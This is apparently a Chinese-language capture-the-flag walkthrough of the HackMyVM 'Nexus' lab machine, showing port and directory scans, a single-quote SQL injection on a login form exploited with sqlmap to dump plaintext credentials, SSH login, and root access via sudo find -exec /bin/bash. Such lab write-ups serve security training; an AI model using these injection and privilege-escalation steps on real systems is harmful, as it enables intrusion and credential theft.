HackMyVM-Nexus

入门sql靶机。

靶机IP：192.168.56.118

信息收集

nmap：

nmap -T4 -A -v 192.168.56.118    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 22:47 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:47
Completed NSE at 22:47, 0.00s elapsed
Initiating NSE at 22:47
Completed NSE at 22:47, 0.00s elapsed
Initiating NSE at 22:47
Completed NSE at 22:47, 0.00s elapsed
Initiating Ping Scan at 22:47
Scanning 192.168.56.118 [4 ports]
Completed Ping Scan at 22:47, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:47
Completed Parallel DNS resolution of 1 host. at 22:47, 0.02s elapsed
Initiating SYN Stealth Scan at 22:47
Scanning 192.168.56.118 [1000 ports]
Discovered open port 22/tcp on 192.168.56.118
Discovered open port 80/tcp on 192.168.56.118
Completed SYN Stealth Scan at 22:48, 7.88s elapsed (1000 total ports)
Initiating Service scan at 22:48
Scanning 2 services on 192.168.56.118
Completed Service scan at 22:48, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.118
Retrying OS detection (try #2) against 192.168.56.118
Initiating Traceroute at 22:48
Completed Traceroute at 22:48, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:48
Completed Parallel DNS resolution of 2 hosts. at 22:48, 0.04s elapsed
NSE: Script scanning 192.168.56.118.
Initiating NSE at 22:48
Completed NSE at 22:48, 5.04s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.01s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Nmap scan report for 192.168.56.118
Host is up (0.0013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 48:42:7a:cf:38:19:20:86:ea:fd:50:88:b8:64:36:46 (ECDSA)
|_  256 9d:3d:85:29:8d:b0:77:d8:52:c2:81:bb:e9:54:d4:21 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (97%), Linux 3.2 (96%), Linux 4.4 (94%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (92%), VMware Player virtual NAT device (92%), Microsoft Windows XP SP3 (91%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   1.01 ms 192.168.21.2
2   1.47 ms 192.168.56.118

NSE: Script Post-scanning.
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.02 seconds
           Raw packets sent: 2072 (94.548KB) | Rcvd: 381 (16.092KB)

dirsearch：

 dirsearch -u 192.168.56.118
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.118/_25-06-11_22-48-38.txt

Target: http://192.168.56.118/

[22:48:40] Starting:                                                                                                                                       
[22:48:40] 403 -  279B  - /.ht_wsr.txt                                      
[22:48:40] 403 -  279B  - /.htaccess.bak1                                   
[22:48:40] 403 -  279B  - /.htaccess.orig                                   
[22:48:40] 403 -  279B  - /.htaccess.sample
[22:48:40] 403 -  279B  - /.htaccess.save
[22:48:40] 403 -  279B  - /.htaccess_orig                                   
[22:48:40] 403 -  279B  - /.htaccessOLD2
[22:48:40] 403 -  279B  - /.htaccess_extra
[22:48:40] 403 -  279B  - /.htaccessBAK
[22:48:40] 403 -  279B  - /.htaccessOLD
[22:48:40] 403 -  279B  - /.htaccess_sc
[22:48:40] 403 -  279B  - /.htm                                             
[22:48:40] 403 -  279B  - /.html                                            
[22:48:40] 403 -  279B  - /.htpasswd_test                                   
[22:48:40] 403 -  279B  - /.httr-oauth
[22:48:40] 403 -  279B  - /.htpasswds                                       
[22:48:41] 403 -  279B  - /.php                                             
[22:48:52] 200 -   13KB - /index2.php                                       
[22:48:53] 200 -  241B  - /login.php                                        
[22:48:58] 403 -  279B  - /server-status                                    
[22:48:58] 403 -  279B  - /server-status/

gobuster：

gobuster dir  -u http://192.168.56.118:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,txt,html,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.118:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 825]
/.php                 (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 352]
/index2.php           (Status: 200) [Size: 75134]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

访问login.php和index.html都没东西，访问index2.php.

好炫酷的界面。。。。

乱点一通之后得到一个信息，提示我们访问auth-login.php。

GetUser

访问之后是个登录界面，抓包看一下登录参数，试用常用轻型字典爆破无果。

密码加个单引号，发现sql报错。

直接丢给sqlmap。

#>1.txt
POST /login.php HTTP/1.1
Host: 192.168.56.118
Content-Length: 18
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.56.118
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.118/auth-login.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
user=admin&pass=1'

sqlmap -l 1.txt --batch --dbs
.......
[23:18:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:18:46] [INFO] fetching database names
[23:18:46] [INFO] retrieved: 'information_schema'
[23:18:46] [INFO] retrieved: 'sion'
[23:18:46] [INFO] retrieved: 'mysql'
[23:18:46] [INFO] retrieved: 'performance_schema'
[23:18:46] [INFO] retrieved: 'Nebuchadnezzar'
[23:18:46] [INFO] retrieved: 'sys'
available databases [6]:
[*] information_schema
[*] mysql
[*] Nebuchadnezzar
[*] performance_schema
[*] sion
[*] sys
[23:18:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-06112025_1118pm.csv'                                                                                                                                                 
[23:18:46] [WARNING] your sqlmap version is outdated

sqlmap -l 1.txt --batch -D Nebuchadnezzar --tables
......
[23:21:36] [INFO] fetching tables for database: 'Nebuchadnezzar'
[23:21:36] [INFO] retrieved: 'users'
Database: Nebuchadnezzar
[1 table]
+-------+
| users |
+-------+

sqlmap -l 1.txt --batch -D Nebuchadnezzar -T users --dump
.......
[23:22:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:22:13] [INFO] fetching columns for table 'users' in database 'Nebuchadnezzar'
[23:22:13] [INFO] retrieved: 'id'
[23:22:13] [INFO] retrieved: 'int(11)'
[23:22:13] [INFO] retrieved: 'username'
[23:22:13] [INFO] retrieved: 'varchar(50)'
[23:22:13] [INFO] retrieved: 'password'
[23:22:13] [INFO] retrieved: 'varchar(255)'
[23:22:13] [INFO] fetching entries for table 'users' in database 'Nebuchadnezzar'
[23:22:13] [INFO] retrieved: '1'
[23:22:13] [INFO] retrieved: 'F4ckTh3F4k3H4ck3r5'
[23:22:13] [INFO] retrieved: 'shelly'
[23:22:13] [INFO] retrieved: '2'
[23:22:13] [INFO] retrieved: 'cambiame2025'
[23:22:13] [INFO] retrieved: 'admin'
Database: Nebuchadnezzar
Table: users
[2 entries]
+----+--------------------+----------+
| id | password           | username |
+----+--------------------+----------+
| 1  | F4ckTh3F4k3H4ck3r5 | shelly   |
| 2  | cambiame2025       | admin    |
+----+--------------------+----------+

得到账号和密码，之前的web端登上去没东西，试试ssh可以连上去。

ssh shelly@192.168.56.118                                
The authenticity of host '192.168.56.118 (192.168.56.118)' can't be established.
ED25519 key fingerprint is SHA256:r1lUfXxL8Fd1e/Q87Jno3P3xHjMTUwmJlKfcsl0AST8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.118' (ED25519) to the list of known hosts.
**************************************************************
HackMyVM System                                              *
                                                             *
   *  .  . *       *    .        .        .   *    ..        *
 .    *        .   ###     .      .        .            *    *
    *.   *        #####   .     *      *        *    .       *
  ____       *  ######### *    .  *      .        .  *   .   *
 /   /\  .     ###\#|#/###   ..    *    .      *  .  ..  *   *
/___/  ^8/      ###\|/###  *    *            .      *   *    *
|   ||%%(        # }|{  #                                    *
|___|,  \\         }|{                                       *
                                                             *
                                                             *
Wellcome to Nexus Vault.                                     *
**************************************************************
shelly@192.168.56.118's password: 
######################
DONT TOUCH MY SYSTEM #
######################
Last login: Thu May  8 22:44:41 2025 from 192.168.1.10
shelly@NexusLabCTF:~$

拿到userflag。

shelly@NexusLabCTF:~$ ls
SA
shelly@NexusLabCTF:~$ ls -sa
total 28
4 .  4 ..  4 .bash_logout  4 .bashrc  4 .local  4 .profile  4 SA
shelly@NexusLabCTF:~$ cd SA
shelly@NexusLabCTF:~/SA$ ls
user-flag.txt
shelly@NexusLabCTF:~/SA$ cat user-flag.txt 

   ▄█    █▄      ▄▄▄▄███▄▄▄▄    ▄█    █▄  
  ███    ███   ▄██▀▀▀███▀▀▀██▄ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
 ▄███▄▄▄▄███▄▄ ███   ███   ███ ███    ███ 
▀▀███▀▀▀▀███▀  ███   ███   ███ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
  ███    █▀     ▀█   ███   █▀   ▀██████▀  
                                        
HackMyVM
Flag User ::  82kd8FJ5SJ00HMVUS3R36gd

Root

sudo-l查看可用命令，发现find。

shelly@NexusLabCTF:~/SA$ sudo -l
sudo: unable to resolve host NexusLabCTF: Fallo temporal en la resolución del nombre
Matching Defaults entries for shelly on NexusLabCTF:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD, use_pty

User shelly may run the following commands on NexusLabCTF:
    (ALL) NOPASSWD: /usr/bin/find

那直接find提权秒了。

1
2
3

shelly@NexusLabCTF:~/SA$ sudo /usr/bin/find / -exec /bin/bash \;
sudo: unable to resolve host NexusLabCTF: Fallo temporal en la resolución del nombre
root@NexusLabCTF:/home/shelly/SA#

只是它的rootflag藏在图片里，转成base64复制过来解码也行，直接从靶机下下来010或者啥隐写工具也行。